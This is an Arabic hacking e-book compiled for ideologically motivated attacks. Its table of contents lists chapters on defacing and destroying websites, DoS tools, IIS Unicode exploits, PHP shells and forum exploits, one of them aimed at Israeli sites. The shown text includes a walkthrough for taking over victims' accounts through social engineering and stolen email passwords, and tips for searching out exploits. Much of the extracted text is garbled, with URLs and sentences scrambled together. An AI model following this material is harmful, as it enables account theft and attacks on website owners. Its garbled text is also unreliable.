‫لمحتويات‬

‫‪.1‬‬
‫‪.2‬‬
‫‪.3‬‬
‫‪.4‬‬
‫‪.5‬‬
‫‪.6‬‬
‫‪.7‬‬
‫‪.8‬‬
‫‪.9‬‬
‫‪.10‬‬
‫‪.11‬‬
‫‪.12‬‬
‫‪.13‬‬
‫‪.14‬‬
‫‪.15‬‬
‫‪.16‬‬
‫‪.17‬‬
‫‪.18‬‬
‫‪.19‬‬
‫‪.1‬‬
‫‪.2‬‬
‫‪.3‬‬
‫‪.4‬‬
‫‪.5‬‬
‫‪.6‬‬

‫‪.7‬‬
‫‪.8‬‬
‫‪.9‬‬
‫‪.10‬‬
‫‪.11‬‬

‫‪.20‬‬
‫‪.21‬‬
‫‪.22‬‬
‫‪.23‬‬
‫‪.24‬‬
‫‪.25‬‬
‫‪.26‬‬
‫‪.27‬‬
‫‪.28‬‬
‫‪.29‬‬
‫‪.30‬‬
‫‪.31‬‬
‫‪.32‬‬
‫‪.33‬‬
‫‪.34‬‬
‫‪.35‬‬
‫‪.36‬‬
‫‪.37‬‬

‫المقدمة‪.‬‬
‫الفهرس‪.‬‬
‫مقدمة عامة عن الهاكر‪.‬‬
‫كيفية البحث في النترنت‪.‬‬
‫مفاهيم خاصة بشبكات النترنت )الجزء الول(‪.‬‬
‫مفاهيم خاصة بشبكات النترنت )الجزء الثاني(‪.‬‬
‫المن عبر النترنت‪.‬‬
‫أمن الشبكات‪.‬‬
‫مصطلحات مهمة للمبتدئين في اختراق المواقع‪.‬‬
‫اختراق المواقع للمبتدئين‪.‬‬
‫الختراق ببرنامج ‪Webcrack.‬‬
‫الختراق ببرنامج ‪MungaBunga.‬‬
‫برنامج تدمير المواقع ‪.WinSmurf‬‬
‫شرح برنامج ‪ Evil Ping‬لتدمير المواقع‪.‬‬
‫برنامج الدرة لتدمير المواقع‪.‬‬
‫تدمير المواقع بدون برامج‪.‬‬
‫التلنت‪.‬‬
‫معلومات عن ‪.DNS‬‬
‫معلومات عن ‪.Routing in the Internet‬‬
‫‪.NETBIOS‬‬
‫بروتوكول خدمة ‪.Finger‬‬
‫‪ Net‬شرح مختصر لدارة الشبكة بإستخدام المر‪.‬‬
‫شرح الـ‪secure shell.‬‬
‫شرح معنى الـ ‪Buffer Overflows.‬‬
‫الـ ‪ CGI‬وعلقتها بالنترنت‪.‬‬
‫كيف تحمي نفسك وتخفي أفعالك؟!‪.‬‬
‫كيف تبقى مجهول الهوية في النت )الجزء الول(؟؟‪.‬‬
‫كيف تبقى مجهول الهوية في النت )الجزء الثاني(؟؟‪.‬‬
‫برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!ً!‪.‬‬
‫شرح برنامج ‪NeoTrace.‬‬
‫كيفية القيام بجمع المعلومات عن موقع أو شبكة‪.‬‬
‫برنامج عمران سكان للبحث عن الثغرات‪.‬‬
‫الختراق عن طريق اليونيكود )الجزء الول(‪.‬‬
‫الختراق عن طريق اليونيكود )الجزء الثاني(‪.‬‬
‫معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود‪.‬‬
‫الدليل الكامل لختراق سيرفر ‪.IIS‬‬
‫دراسة مفصلة وبعمق في الـ ‪UniCode.‬‬
‫تدريب على عملية الختراق بواسطة اليونيكود‪.‬‬
‫شرح مفصل لكيفية اختراق المواقع المجانية‪.‬‬
‫درس مفصل عن الكوكيز‪.‬‬
‫شرح برنامج السطورة ‪God Will‬في تلغيم الصفحات‪.‬‬
‫وداعًا للبرنامج السطورة ومرحبا ببرنامج ‪.NOOP4‬‬
‫معلومات مهمة عن المواقع التي تدعم الفرونت بيج‪.‬‬
‫اختراق المواقع التي تدعم الفرونت بيج‪.‬‬
‫الختراق العشوائي‪.‬‬
‫الطريقة الصحيحة والمثلى في اختراق المواقع‪.‬‬
‫نبذه يسيرة ومبسطة عن كيفية اختراق المواقع‪.‬‬
‫)>س&ج<( في اختراق المواقع للمبتدئين‪.‬‬

‫‪1‬‬

‫‪.38‬‬
‫‪.39‬‬
‫‪.40‬‬
‫‪.41‬‬
‫‪.42‬‬
‫‪.43‬‬
‫‪.44‬‬
‫‪.45‬‬
‫‪.46‬‬
‫‪.47‬‬
‫‪.48‬‬
‫‪.49‬‬
‫‪.50‬‬
‫‪.51‬‬
‫‪.52‬‬
‫‪.53‬‬
‫‪.54‬‬
‫‪.55‬‬
‫‪.56‬‬
‫‪.57‬‬
‫‪.58‬‬
‫‪.59‬‬
‫‪.60‬‬
‫‪.61‬‬
‫‪.62‬‬
‫‪.63‬‬
‫‪.64‬‬
‫‪.65‬‬
‫‪.66‬‬
‫‪.67‬‬
‫‪.68‬‬
‫‪.69‬‬
‫‪.70‬‬
‫‪.71‬‬
‫‪.72‬‬
‫‪.73‬‬
‫‪.74‬‬
‫‪.75‬‬
‫‪.76‬‬
‫‪.77‬‬

‫برنامج ‪ CgiScaner‬للبحث عن الثغرات‪.‬‬
‫شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع‪.‬‬
‫شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع‪.‬‬
‫اماكن وجود ملف الباسورد في أنظمة التشغيل‪.‬‬
‫اختراق الموقع )الجزء الول(‪.‬‬
‫اختراق المواقع )الجزء الثاني(‪.‬‬
‫اختراق المواقع )الجزء الثالث(‪.‬‬
‫درس في اختراق المواقع )متوسط(‪.‬‬
‫شرح ملف ‪.htaccess‬‬
‫نظام نقل الملفات ‪FTP.‬‬
‫الختراق عن طريق ‪FTP.‬‬
‫اختراق الـ ‪.SQL‬‬
‫درس مفصل عن الـ‪SQL.‬‬
‫درس لحتراف الهاك في اختراق المواقع‪.‬‬
‫استغلل لينكس في اختراق المواقع‪.‬‬
‫درس اخر في اختراق المواقع عن طريق لينكس‪.‬‬
‫شرح مفصل من اللف إلى الياء في احتراف اختراق المواقع عن طريق لينكس‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الول(‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الثاني(‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الثالث(‪.‬‬
‫شرح أداة ‪.anmap‬‬
‫طريقة لقتحام السيرفرات بدون ثغرات‪.‬‬
‫‪.Cross Site Scripting‬‬
‫كود تدمير سجل الزوار‪.‬‬
‫وضع فايروس في صفحة‪.‬‬
‫الثغرااات‪.‬‬
‫شرح شبه مفصل عن الثغرات‪.‬‬
‫كيف تستخدم الثغرات‪.‬‬
‫تمتع بإختراق المواقع السرائيلية مع هذه الثغرة‪.‬‬
‫ثغرة نيوك‪.‬‬
‫ثغرة ‪.Chunked‬‬
‫حماية المنتديات‪.‬‬
‫اختراق المنتديات من نوع ‪.vBulletin2,2,0‬‬
‫درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها‪.‬‬
‫ثغرة في منتديات ‪.vBulletin 2,2,9‬‬
‫اختراق منتديات ‪.phpbb 2.0.0‬‬
‫ثغرة في ‪. php nuke‬‬
‫أفضل المنتديات والمواقع العربية للهاك‪.‬‬
‫أفضل مواقع المن والهاك النجليزية‪.‬‬
‫الخاتمة‪.‬‬

‫‪2‬‬

‫بسم الله الرحمن الرحيم‬
‫الحمد لله رب العالمين الرحمن الرحيم والصلة والسلم على أشرف‬
‫النبياء‬
‫والمرسلين نبينا محمد عليه أفضل الصلة وأتم التسليم‪،‬‬
‫أما بعد‪...‬‬
‫ارجوا من العلي القدير أن يوفقني في كتابة هذا الكتاب الذي سيكون‬
‫مرجعا ً لخواني وأخواتي المسلمين‪ ،‬ففي هذا الكتاب سأقوم بنقل كل ما‬
‫كتب في اختراق المواقع وتدميرها عن أخواني المسلمين من كيفية‬
‫الختراق بالبرامج وبغيرها للمواقع المعادية لديننا الحنيف‪،،،‬‬
‫وارجوا من القراء الدعاء في ظهر الغيب لجامع هذا الكتاب‪.‬‬
‫ملحظة‪ :‬مواضيع هذا الكتاب ليس من تأليفي إنما هي نقل ً عن اخواني‬
‫المسلمين‪.‬‬
‫اقرأ هذا اول ً قبل البدء بقراءة مواضيع هذا الكتاب"اقسم بالله العلي‬
‫العظيم‬
‫الذي رفع السماء بل عمد أل اقوم بتطبيق ما في هذا الكتاب من طرق‬
‫على مواقع اخواني المسلمين وأن انفعهم قدر ما استطيع"‬
‫والله الموفق‪،،،‬‬

‫‪3‬‬

‫"من هم الهاكر "‬
‫الهكرز هم اشخاص مخترقون لجهزة الغير بمساعدة احدى برامج الختراق المشهورة إعتماًد على برامج‬
‫‪.‬مساندة تسهل عملية التصال بين الحاسبين تسمى بالباتش اوالسيرفر‬

‫كيف يتم اختراق مواقع النترنت؟؟‬‫هذا السؤال الذي دفع الكثيرين الي البحث والبحار في عالم النت‬
‫هناك انواع من الصفحات والسرفرات التي توفر مواقع مجانية‬
‫النوع الول‬
‫سيرفرات تحتفظ ببياناتك واذا نسيت او لم تتذكر باسوورد موقعك فانها سوف تطلب منك بياناتك الشخصية‬
‫السرية التي ل يعلمها ال انت مثل‬
‫اسمك الحقيقي الكامل‬
‫عمرك وميلدك‬
‫من اي بلد انت‬
‫وتختلف الدقة من سيرفر الي سيرفر آخر‬
‫النوع الثاني‬
‫سيرفرات تحتفظ ببياناتك واذا اضعت الباسوورد او نسيته فانها تطلب منك فقط الضغط علي ايكون مكتوب‬
‫عليه‬
‫))نسيت الباسوورد((‬
‫ومن ثم يرسلون الباسوورد الي اليميل الخاص بك‬
‫‪...................................................................‬‬
‫هذا النوع يسهل اختراقه اذا عرفت بيانات الشخص واستطعت التحدث معه بشتي الطرق وباسلوب لبق وما‬
‫ان تعرف بياناته‬
‫الشخصية حتي يمكنك ان تذهب الي صفحته الخاصه والضغط علي ايكون انك نسيت الباسوورد وادخال‬
‫البايانات الخاصة‬
‫‪ ...‬ومن ثم تغيير الباسوورد‬
‫وتغيير بيانات صاحب الصفحة الخاصة والسرية‬
‫‪..........................‬‬
‫النوع الثاني‬
‫هذا النوع مهما حاولت سرقة الباسوورد فانك لتستطيع ان تمتلك الصفحة لمدة طويلة لن الشركة سوف‬
‫ترسل اليه الباسوورد‬
‫‪ ..‬الجديد ‪ ..‬ومن هنا سيعرف الباسوورد ورقمه الجديد‬
‫!!! وسيتم اعادة ملكيته الي الصفحة او الموقع مره أخري‬
‫(( اذا كيف الحل ؟؟‬
‫‪ ..‬الحل هو‬
‫ان تعرف باسوورد اليميل الخاص به وحين تعرف الباسوورد سيمكنك الذهاب الي الشركة وكتابة انك نسيت‬
‫الباسوورد للموقع‬
‫‪ ..‬فسيتم اخطارك علي اليميل الذي سرقته ‪ ..‬بالباسوورد للموقع‬
‫‪.‬ومن هنا يمكنك سرقتة وملكيته وانت بسلم‬
‫‪،،،‬انتهى‬

‫‪4‬‬

‫"كيفية البحث في النترنت"‬

‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة <‬
‫> ةةةةةة‪ :‬ةةةة ةةةة <‬
‫كيفية البحث في النترنت ؟‬
‫عندما نسمع عن برنامج ما او عن مشكلة ما او اي شيء في النترنت ونريد البحث عنها كيف يتم ذلك ؟؟‬
‫غالبا نجد ان الشباب ل يقدر ان يقوم بالبحث في منتدى فما بالك بمسئله تريد البحث عنها في النترنت ؟ وقد‬
‫تجده يبحث ولكن ل يحصل بنتيجه والخطأ ليس في البحث‬
‫بل في طريقة البحث‬
‫صنعت محركات البحث حتى تساعدك في الوصول الى ما تريد باقصر وقت ممكن ولكن عليك ان تعلم ان‬
‫محركات البحث لكل منها عمل مع العلم انها عامه ولكن‬
‫ما هي النتائج ؟؟‬
‫بالنسبه مثل للجوجل انا اعتبره المحرك الذكي فهو يعرف ماذا كتبت فلذلك يعطيك النتائج الولى وهي غالبا‬
‫التي تريدها‬
‫بالنسبه للياهو هو ايضا ذكي ولكن ذكائه تجاري بحت حيث انه يقدم لك المواقع التجاريه التي تقدم ما تريد‬
‫والتي يتعامل معها المحرك ثم المواقع التجاريه التي ل يتعامل‬
‫معها المحرك ثم المواقع العامه وهي ما ترده انت احيانا‬
‫اعتقد ان المسئله وضحت‬
‫يا اخوان انا ابغى ابحث عن برنامج ما مثل يجب علي ان اخطط للبحث قبل ان اذهب الى المنتديات واسئل‬
‫لزم انت تتعلم كيف تبحث‬
‫وش الفرق بينك وبين النسان اللي هيجيبلك المعلومه من المنتدى ؟ هل يملك ريشه على دماغه ؟؟؟ ل اعتقد‬
‫ذلك‬
‫هل النترنت لديه سريعه للغايه وانت بطئيه للغايه ؟ ايضا ل اعتقد ذلك مع العلم ان السرعات العاليه اثبتت‬
‫فشلها بالنسبه لبعض الشخاص‬
‫التي ل تعرف كيف توظف عقولها‬
‫كنت مره في حديث مع صديق لي بدوله عربيه في الخليج وكان يحدثني بصراحه ويقول لي وال يا اخ بلك‬
‫انا الن لي سنه كامله على النترنت‬
‫غير محدد بباندويث وبسرعة ‪ 256‬ول اعرف من برامج الختراق غير الهاك اتاك ‪ ISDN‬مع خط‬
‫فعل انا تحطمت سنه كامله ومعك القوه الضاربه هذه ول تعرف غير الهاك اتاك ؟ قلتلله انت اكيد وقتك ما بين‬
‫مواقع الغاني والفلم والداون لود لها والشات قال ايوال هذا هو انا‬
‫وبذلك فعل ايقنت ان السرعه ليست كل شيء‬
‫‪.‬اهم شي عقلية من يملك السرعه فالسلح الذي ل تستطيع استخدامه ‪ -‬ل ينفع ‪ - (:‬ا هـ‬
‫‪ :‬الن سنقوم بشرح كيفية التخطيط للبحث‬
‫طريقه بسيطه جدا وهي عبر تقسيم المواقع‬
‫مواقع تجاريه‬
‫‪5‬‬

‫)) مواقع برامج )) ويندوز ‪ -‬ليونكس‬
‫مواقع ملتيميديا‬
‫مواقع سياسيه واخباريه‬
‫مواقع هاك‬
‫مواقع كراك‬
‫مواقع سكيوريتي‬
‫مواقع هاردوير‬
‫منتديات‬
‫)) محرك بحث جوجل )) هذا لوحده عالم‬
‫مواقع ‪ .....‬الخ‬
‫الن لنأخذ ما نبحث عنه‬
‫مثل برنامج ؟ بسيطه جدا ؟ وش يخليني اروح ابحث مثل في الياهو ؟؟؟ وش يخليني ابحث بمحرك عام ؟؟؟؟‬
‫او حتى وش يخليني اروح ابحث بالقوقل ؟؟؟‬
‫خلص بما انه برنامج انطلق فورا الى مواقع البرامج امثال زد دي نت ‪ -‬ويب اتاك ‪ -‬داون لود ‪ -‬وغيرها‬
‫وبالنسبه لليونكس فهناك موقع انا اعتبره انه اقوى من موقع داون لود في برامجه للويندوز‬
‫)) وهو موقع فريش ميت )) اخر الموضوع ساضع كل تلك المواقع كمرجع‬
‫بعد ان بحثت ولم اجد البرنامج ماذا افعل ؟ هل انتهى العمل ؟ ل لم ينتهي بعد اذهب الى الجوجل وابحث عن‬
‫ما تريد وابدا بقرائه النوتس الذي يخبرك ماذا تحوي هذه الصفحه‬
‫واذا وجدت ما تريد ادخل اليها‬
‫لم تجد ؟؟ )) ما اعتقد انك ما هتلقي اللي تدور عليه انا عمري ما سويت هالطريقه ال واجد ما اريد (( ولكن‬
‫لنفرض انك لم تجد ؟ ماذا ستفعل ؟ اذهب الى المنتديات وابحث‬
‫قبل ان تسأل واذالم تجد وقتها بامكانك السوال بالمنتدى‬
‫هذه نقطه نقطة اخرى مثل انت منت عارف اللي انت تبحث عنه بالظبط‬
‫مثل انا ادور على ثغره عارف نوعها ولكن ماني عارف موجوده في وش‬
‫‪ CSS‬او ‪ XSS‬واللي اختصارها ‪ Cross Site Scripte‬ولتكن مثل ثغرات الـ‬
‫انا ما ادور على الثغره ادور على اكسبلويت مثل وش اسوي ؟؟؟‬
‫هيطلعللك كل شي عنها ابدا ابحث فيما تريد وفي نفس ‪ XSS‬اذهب اول لمواقع السكيوريتي ابحث عن كلمة‬
‫الوقت اذهب الى الجوجل مثل وابحث عن‬
‫ولكن هذا ل يكفي انا ابغى شي بعينه والجوجل مو زي مواقع السكيوريتي هتجيب شي بسيط ل ‪XSS‬‬
‫) ‪ ( +‬الجوجل هيجيب بلوي ولذلك علي بتحديد البحث عبر علمه‬
‫‪ :‬يعني انا ادور بجز وادور اكسبلويت وادور باسم الثغره فعلي ان اكتب‬
‫‪XSS+BUG+EXPLOIT‬‬
‫‪ :‬هاكتب ‪ IIS‬مثل ادور ثغرات‬
‫‪IIS+exploit+bug‬‬
‫خليه يطلعللك كل شي عن المسئله اللي تبحث عنها اهم شي انه يجيبلك مواضيع في ما تبحث عنه‬
‫ومن ثم المنتديات ومن ثم الكتابه عن ما تريد اذا لم تجد‬
‫اهم شي بالنقطه التخطيط للبحث‬
‫عن ماذا ابحث ؟ موضوع يتعلق ببرنامج ؟ ويندوز وال ليونكس ؟ رتب المواقع ‪ :‬ابدا البحث‬
‫عن ماذا ابحث ؟ موضوع يتعلق بالشوبرينج ؟ رتب المواقع ‪ :‬ابدا البحث‬

‫‪6‬‬

net.http://hotbot.net/ ‫ مواقع سكيوريتي‬: http://www.securityfocus.http://intel.lycos.lycos.aljazeera.com/ .http://www.com/ ‫ )) عبر برامجها مثثل الكازا او المورفيس او اوديو جالكسي او وين ام اس‬: ‫ )) مواقع ملتيميديا‬kazaa WinMX ‫الكثر شهره‬ ‫ مواقع سياسيه واخباريه‬: http://news.ussrback.online.securiteam.http://www.ntsecurity.http://www.altavista.ntsecurity.com/ http://www.uk/hi/arabic/news http://arabic.ntbugtraq.asus.com/ .com/ .com/ .google.http://www.nz/ .amdmb.bbc.com/ .yahoo.http://www.nu/ http://www.http://drivers.com/ ‫انتهى‬،،، 7 .com/ ‫ محركات بحث عاديه ومتقدمه‬: http://www.com/ ‫ مواقع هاردوير‬: http://nvidia.co.com/ .http://www.com/ .com/ .http://www.com/ .‫وهكذا‬ ‫الن ساضع لكم مجموعه من المواقع تفيدكم جدا‬ ‫ الملك جوجل‬: http://www.com/ http://www.cnn.

winipcfg‬إذا كنت تستخدم وندوز باعتماد اللغة العربية اختر‬ ‫"ابدأ" ثم "تشغيل" ثم اكتب ‪.40..‬‬ ‫الهاكر الطيب سلسلة من الحلقات نقدمها لك أخي القارئ‪ ،‬كوسيلة تعليمية لكل المستخدمين على مختلف‬ ‫مستوياتهم لكي يتعلموا كيف يتقون شرور هؤلء الهاكرز ولكي يعرفوا الحيل التي يستخدمها الهاكرز للحاق‬ ‫الذى بهم‪ .‬هذا الكدر نسميه "الهاكرز" أو من يسمون بالمخترقين في بعض الحيان‪.66.1‬وليس ‪ ،24.‬ولكن على الرغم من كثرة الشياء المفيدة في النترنت إل أنه لبد من وجود ما يكدر‬ ‫الصفو‪ .‬‬ ‫رقم ‪IP‬‬ ‫ما الغرض من بطاقة الحوال المدنية التي تحملها ؟ انها مجرد وسيلة لتمييزك وتعريفك‪ .‬‬ ‫نفس المبدأ ينطبق في مجال الحاسب اللي من ناحية الشبكات‪ ،‬فلتمييز الجهزة المرتبطة بشبكة واحدة يعطى‬ ‫لكل جهاز رقم مميز يستحيل تكراره في أي جهاز آخر مرتبط بنفس الشبكة وهذا الرقم هو ما يسمى بعنوان‬ ‫الجهاز أو ‪.‬ويوجد لكل منظمة قاعدة‬ ‫‪8‬‬ .winipcfg‬‬ ‫توزيع أرقام الـ ‪IP‬‬ ‫هل سبق وأن تساءلت لماذا كان رقم ‪ IP‬الخاص بك هو ‪ 212.5.‬‬ ‫تشرف منظمة ‪ (IANA(Internet Assigned Numbers Authority‬على توزيع أرقام ‪ IP‬على‬ ‫مستوى العالم‪ ،‬حيث أنها تقوم بالشراف على ثلث منظمات فرعية وتكون كل منظمة مسؤولة عن جزء‬ ‫معين من العالم وهذه المنظمات الفرعية هي‪:‬‬ ‫‪ -1‬منظمة ‪ (ARIN (American Registry for Internet Numbers‬وتشرف على أمريكا‬ ‫الشمالية والجنوبية والمناطق الكاريبية وأجزاء من افريقيا‬ ‫‪ -2‬منظمة ‪ (RIPE (Réseaux IP Européens‬وتشرف على منطقة أوروبا والشرق الوسط وأجزاء‬ ‫من افريقيا‬ ‫‪ -3‬منظمة ‪ (APNIC (Asia Pasific Network Information Center‬وتشرف على آسيا‬ ‫تقوم كل منظمة بالشراف على توزيع ارقام ‪ IP‬للدول الواقعة تحت مجال اشرافها‪ .33.‬بل ستكون‬ ‫الهاكر الطيب‪.‬‬ ‫مقدمة‪:‬‬ ‫هذه الحلقة ستكون مخصصة لتقديم بعض المهارات والمعلومات الساسية التي يجب أن يعرفها كل من يريد‬ ‫اتقاء شر الهاكرز‪ ،‬وهي بعض المصطلحات والمفاهيم الخاصة شبكات الحاسب اللي‪.‬‬ ‫من هم الهاكرز ؟ وما هي أهدافهم ؟ وكيف نتقي شرهم ؟ أسئلة ل بد أنها دارت في رأس أكثر المستخدمين‬ ‫في مختلف أنحاء العالم‪ ،‬ول سيما أولئك المستخدمين الذين طالهم أذى الهاكرز سواء بسرقة معلومات من‬ ‫أجهزتهم أو إتلف محتوياتها أو في أهون الحوال إخافتهم وإرعابهم‪.‬‬ ‫لعلك الن تتساءل كيف أعرف عنوان جهازي عندما أتصل بالنترنت؟ المر سهل جدا من شريط المهام في‬ ‫الوندوز انقر على ‪ Start‬ثم ‪ run‬ثم أدخل ‪ .IP‬‬ ‫في حالة الشبكات الدائمة والتي يكون الجهاز مرتبطا بالشبكة بواسطة أسلك الشبكة‪ ،‬يكون هذا الرقم ثابتا‬ ‫للجهاز دائما‪ .‬مالم يتم نزع الجهاز من الشبكة بشكل دائم‪ ،‬ولكن في حالة التصال الهاتفي فإن عنوان الجهاز‬ ‫يتغير كلما اتصلت على موفر الخدمة الذي تدخل للشبكة من خلله‪.‬باختصار ستكون أخي القارئ أحد هؤلء الهاكرز‪ ،‬ولكن لن تكون مثلهم في الشر‪.3‬وهل سبق‬ ‫وأنت تساءلت لماذا تبدأ ارقام الـ ‪ IP‬في السعودية بالرقم ‪ 212‬وليس بأي رقم آخر ؟ في الحقيقة إن أرقام‬ ‫‪ IP‬ليتم توزيعها بطريقة عشوائية أو بطريقة "كٌل يأخذ ما يريد" بل بالعكس يوجد هناك منظمات تشرف‬ ‫على توزيع أرقام ‪ IP‬على الدول والمؤسسات داخل الدول بحيث يتم معرفة الجهة عند معرفة رقم ‪ IP‬الذي‬ ‫تمتلكه‪.‬فالرقم الموجود على‬ ‫بطاقتك يستحيل تكراره لي مواطن آخر في نفس البلد‪.‫")مفاهيم خاصة بشبكات النترنت )الجزء الول"‬ ‫>ةةةةة <‬ ‫> ةةةةةة‪ :‬ةةةة ةةةةةة <‬ ‫النترنت عالم مليء بالفائدة‪ ،‬مليء بالمتعة‪ ،‬عالم يجد فيه كل إنسان ما يهمه‪ ،‬باختلف مجالت الهتمام‬ ‫واختلف الشخاص‪ .

html‬‬ ‫وأدخل الرقم ‪ 212.‬‬ ‫المنفذ ‪Port‬‬ ‫ماهو المنفذ ؟ تخيل منزل فيه العديد من البواب وأن كل واحد من هذه البواب مخصص لخدمة معينة ‪ ،‬فباب‬ ‫لستقبال الضيوف وباب آخر للخدم وباب آخر لدخول الخدمات‪.‬‬ ‫ولمعرفة مزود الخدمة بواسطة رقم ‪ IP‬الثلثي )أي رقم ‪ IP‬بدون آخر رقم من الجهة اليمنى ( يمكنك زيارة‬ ‫موقع المنظمة المشرفة على البلد الذي ينتمي له رقم ‪ IP‬واستخدام خدمة ‪ whois‬الخاصة بها‪ .26.26.net/db/whois.‬فمثل الجهاز الذي يحمل رقم ‪ IP 212.‬فبالتالي عندما تأتي بيانات للجهاز على منفذ معين فسوف‬ ‫يعرف الجهاز لي تطبيق تنتمي هذه البيانات ويقوم بإرسالها لهذا التطبيق الذي يقوم بمعالجتها‪.10.75.34‬والجهاز الذي يحمل رقم ‪IP‬‬ ‫‪ 212.net/db/whois.1‬كل قسم من هذه القسام يمكن أن‬ ‫تكون له قيمة تتراوح بين ‪ 0‬و ‪) 255‬مع وجود بعض الستثناءات التي ليس هذا المجال لذكرها( الشيء‬ ‫الذي يجب معرفته أن أول ثلثة أقسام من الجهة اليسرى من رقم ‪ IP‬غالبا ما تكون محجوزة لمزود خدمة‬ ‫معين بحيث تكون جميع أرقام ال ‪ IP‬التي يتشابه بها أول ثلثة أقسام من الجهة اليسرى تنتمي لنفس مزود‬ ‫الخدمة‪ .ripe.26.‬نفس المبدأ ينطبق على الحاسب اللي فالجهاز‬ ‫يحتوي على العديد من الخدمات مثل خادم الويب ‪ web server‬وخادم الملفات ‪ ftp server‬وغيرها‪.‬‬ ‫‪ DNS‬ماهو ؟‬ ‫أنت بالطبع تتذكر أسماء أصدقائك ول تواجه أي مشكلة في استرجاعها من ذاكرتك ولكن ماذا عن أرقام‬ ‫‪9‬‬ .75‬في المربع الموجود في الصفحة ومن ثم انقر الزر ‪ search‬وستحصل على‬ ‫جميع المعلومات المخزنة عن مزود الخدمة‪.‬فمثل‪،‬‬ ‫لمعرفة مزود الخدمة في المثال أعله قم بالذهاب للموقع ‪http://www.html‬وأدخل رقم‬ ‫‪ IP‬وستحصل على معلومات متكاملة عن صاحب هذا الرقم‪.10.‫بيانات تمكنك من معرفة صاحب رقم ‪ IP‬معين وتسمى هذه الخدمة بخدمة ‪ whois‬حيث تقوم بإدخال رقم ‪IP‬‬ ‫التابع لمنظمة معينة وستحصل على معلومات عن من يمتلك هذا ‪ IP‬فمثل لمعرفة صاحب رقم ‪ IP‬معين في‬ ‫المملكة العربية السعودية قم بالذهاب للموقع ‪ http://www.ripe.‬‬ ‫عائلة الـ ‪IP‬‬ ‫من المعروف أن رقم الـ ‪ IP‬يتكون من أربعة أقسام كالتالي ‪ 10.201‬غالبا ما ينتميان لنفس مزود الخدمة‪.75.‬‬ ‫فكل تطبيق لديه منفذ معين يستخدمه لرسال واستقبال بياناته وهذا نوع من التنظيم فمثل خدمة الويب غالبا‬ ‫ما تكون على المنفذ ‪ 80‬وخدمة الملفات تكون على المنفذ ‪ 21‬وبرنامج النت ميتنغ يكون على عدة منافذ‬ ‫منها ‪ 1720‬وكل تطبيق يكون له منفذ معين‪ .

‬اختصارا‪ ،‬يمكن القول بأن خادم السماء ‪ DNS‬ماهو ال جهاز يحتوي‬ ‫على قاعدة بيانات فيها اسماء الجهزة في النترنت وأرقام ‪ IP‬الخاصة بها‪.‬‬ ‫قلنا في السابق أن كل جهاز يقوم جهازك بالتخاطب معه يعرف رقم الـ ‪ IP‬الخاص بك‪ ،‬ولكن يجب أن ل يفهم‬ ‫هذا الكلم بالشكل الخاطيء فمثل في نظام المحادثة ‪ IRC‬تقوم أنت بالتصال بمزود المحادثة ‪chat‬‬ ‫‪ server‬وكذلك الحال بالنسبة لجميع المستخدمين‪ ،‬بحيث يكون هذا المزود كالوسيط بينك وبين جميع‬ ‫الشخاص المتصلين به‪ ،‬فلكي تقوم بإرسال رسالة لشخص ما‪ ،‬يقوم برنامج المحادثة بإرسال الرسالة لمزود‬ ‫المحادثة والذي بدوره يقوم بإرسالها للشخص وبالتالي فإنه ل يوجد اتصال مباشر بينك وبين أي شخص آخر‬ ‫خلل نظام المحادثة‪ ،‬ولها تلحظ أن برامج المحادثة غالبا ما تعطيك رقم ‪ IP‬للشخاص الخرين ناقصا‬ ‫)بالشكل التالي ‪ ( XXX.cnn.cnn.‫هواتفهم ؟كم رقما تحفظ منها ؟ اثنان ؟ عشرة؟ مهما كانت ذاكرتك جيدة فلن تستطيع حفظ أرقام هواتفهم كلها‬ ‫وإن فعلت فتبقى الحقيقة أن نسيان الرقام أكثر سهولة من نسيان السماء‪ .222..‬‬ ‫هذا شيء ضروري فلكي ترسل رسالة إلى شخص معين فيجب أن تعرف عنوانه ويجب هو أيضا أن يعرف‬ ‫عنوانك لكي يقوم بالرد عليك‪ .server‬‬ ‫هناك أمر في نظام الدوس يسمح لك بمعرفة جميع الجهزة المتصلة بجهازك ) أو التي يقوم جهازك بارسال‬ ‫واستقبال البيانات منها( ومعرفة المتفذ )‪ (port‬الذي تم عليه التصال) فائدة المنفذ هي تحديد التطبيق الذي‬ ‫تم التصال عليه( وهذا المر هو المر ‪ netstat‬ما عليك إل أن تقوم بتشغيل ‪ ms-dos prompt‬من‬ ‫قائمة برامج ‪ programs‬ومن ثم اكتب هذا المر وستحصل على قائمة بكل هذه الجهزة مع المنفذ الذي تم‬ ‫عليه التصال في كل الجهازين‪..‬بالطبع هناك عدة استثناءات سنتحدث عنها في وقتها‪ .1‬في حالة كون الشخص‬ ‫مشرفا على الغرفة التي‬ ‫‪10‬‬ ..‬‬ ‫المحادثة )‪IRC) Internet Relay Chat‬‬ ‫طريقة عمل نظام المحادثة هي وجود مزود محادثة ‪ chat server‬ووجود برنامج محادثة ‪chat client‬‬ ‫في كل جهاز بحيث إذا أراد شخص الدخول للمحادثة يقوم بتشغيل برنامج المحادثة ‪ ،‬والذي بدوره يقوم‬ ‫بالتصال بمزود المحادثة‪ ..111.‬‬ ‫المر ‪netstat‬‬ ‫هل تعلم بأنه من المستحيل أن يكون هناك تخاطب بين جهازك وبين أي جهاز آخر في النترنت بدون أن‬ ‫يكون لدى كل من الجهازين رقم الـ ‪ IP‬الخاص بالجهاز الخر؟ وأقصد بالتخاطب هو نقل أي نوع من البيانات‪.333‬وهذا فيه نوع من الحماية للمستخدمين حتى ل يتمكن الهاكرز من‬ ‫معرفة رقم الـ ‪ IP‬الكامل‬ ‫للمستخدم ومن ثم‬ ‫استخدامه للوصول إليه‪.145.connection‬طبعا لكل اتصال يجب أن يكون هناك من يقوم بطلب التصال‬ ‫ويسمى عميل أو ‪ Client‬ويكون هناك أيضا من يتم التصال عليه ويسمى مزود ‪.10‬بدل من ‪ www.‬وهما‬ ‫كالتالي‪:‬‬ ‫‪ .‬وبعد إجراء التصال يتمكن الشخص من الدخول لي من الغرف الموجودة في‬ ‫المزود كما يمكنه أيضا انشاء الغرف الخاصة به‪ ،‬كما يمكنه أيضا القيام بالعديد من الوظائف التي ليس هذا‬ ‫المجال 